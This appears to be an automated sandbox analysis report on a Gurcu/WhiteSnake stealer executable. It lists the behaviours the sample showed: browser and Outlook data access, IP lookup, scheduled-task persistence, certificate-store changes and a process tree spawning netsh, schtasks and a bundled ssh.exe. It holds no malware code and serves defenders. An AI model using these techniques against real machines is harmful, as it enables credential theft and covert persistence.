Malware Analysis Report

2024-10-19 06:43

Sample ID 230908-j55t4saa54
Target a43b860d290321de53ed6deb5cae95af.exe
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
Tags
gurcu collection discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

Threat Level: Known bad

The file a43b860d290321de53ed6deb5cae95af.exe was found to be: Known bad.

Malicious Activity Summary

gurcu collection discovery spyware stealer

Detect Gurcu Stealer V3 payload

Gurcu family

Gurcu, WhiteSnake

Checks computer location settings

Loads dropped DLL

Deletes itself

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Checks installed software on the system

Looks up external IP address via web service

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

outlook_office_path

Suspicious use of AdjustPrivilegeToken

outlook_win_path

Runs ping.exe

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-08 08:16

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu family

gurcu

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-08 08:16

Reported

2023-09-08 08:18

Platform

win7-20230831-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2576 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\cmd.exe
PID 2576 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\cmd.exe
PID 2576 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\cmd.exe
PID 1256 wrote to memory of 2620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 1256 wrote to memory of 2620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 1256 wrote to memory of 2620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 1256 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1256 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1256 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1256 wrote to memory of 2500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1256 wrote to memory of 2500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1256 wrote to memory of 2500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1256 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 1256 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 1256 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2616 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2548 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2548 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2548 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2548 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2548 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2548 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2548 wrote to memory of 2192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2548 wrote to memory of 2192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2548 wrote to memory of 2192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2616 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 312 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 312 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 312 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 312 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 312 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 312 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 312 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 312 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 312 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2616 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2616 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2616 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2616 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2788 wrote to memory of 2352 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2788 wrote to memory of 2352 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2788 wrote to memory of 2352 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2352 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2352 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2352 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2884 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2884 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2884 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2884 wrote to memory of 1256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2884 wrote to memory of 1256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2884 wrote to memory of 1256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2884 wrote to memory of 2600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2884 wrote to memory of 2600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2884 wrote to memory of 2600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2352 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2352 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2352 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2004 wrote to memory of 1968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2004 wrote to memory of 1968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2004 wrote to memory of 1968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

outlook_win_path

Description Indicator Process Target
